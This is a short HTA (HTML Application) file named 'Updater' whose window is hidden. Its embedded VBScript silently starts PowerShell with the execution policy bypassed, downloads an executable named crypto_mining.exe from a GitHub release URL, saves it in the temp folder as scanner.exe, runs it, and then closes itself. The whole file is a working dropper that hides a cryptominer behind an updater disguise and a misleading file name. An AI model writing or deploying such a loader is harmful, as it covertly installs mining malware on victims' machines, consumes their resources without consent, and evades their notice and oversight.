<hta:application
  applicationname="Updater"
  border="none"
  caption="no"
  showintaskbar="no"
  windowstate="hidden" <!-- This hides the HTA window -->
  scroll="no"
>

<script language="VBScript">
Set objShell = CreateObject("Wscript.Shell")
' Run PowerShell silently and download and execute the payload
objShell.Run "powershell -ExecutionPolicy Bypass -Command ""Start-Process 'powershell' -ArgumentList '-WindowStyle Hidden -ExecutionPolicy Bypass -Command ""$url='https://github.com/jozef800/discord/releases/download/v7.0/crypto_mining.exe';$out='$env:temp\scanner.exe';Invoke-WebRequest -Uri $url -OutFile $out;Start-Process $out""'""", 0, False
Self.Close
</script>

</hta:application>
